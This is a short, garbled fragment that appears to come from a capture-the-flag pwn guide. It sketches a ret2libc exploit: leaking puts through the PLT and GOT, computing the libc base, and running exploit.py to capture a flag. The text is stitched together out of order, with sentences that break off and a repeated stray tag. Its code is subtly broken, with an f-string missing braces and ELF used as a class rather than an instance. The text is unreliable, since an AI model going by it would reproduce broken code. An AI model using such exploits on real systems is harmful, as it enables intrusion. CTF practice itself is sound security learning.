Hunta-694 May 2026

If the challenge is a , use:

CTF<something_related_to_the_challenge> Capture it with: hunta-694

$ ./exploit.py | tee flag.txt or within the interactive session: If the challenge is a

# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)') hunta-694

# ---- Step 1: Leak an address (example: puts@GLIBC) ----------------- offset = <offset_to_ret> puts_plt = ELF.plt['puts'] puts_got = ELF.got['puts'] main_addr = ELF.symbols['main']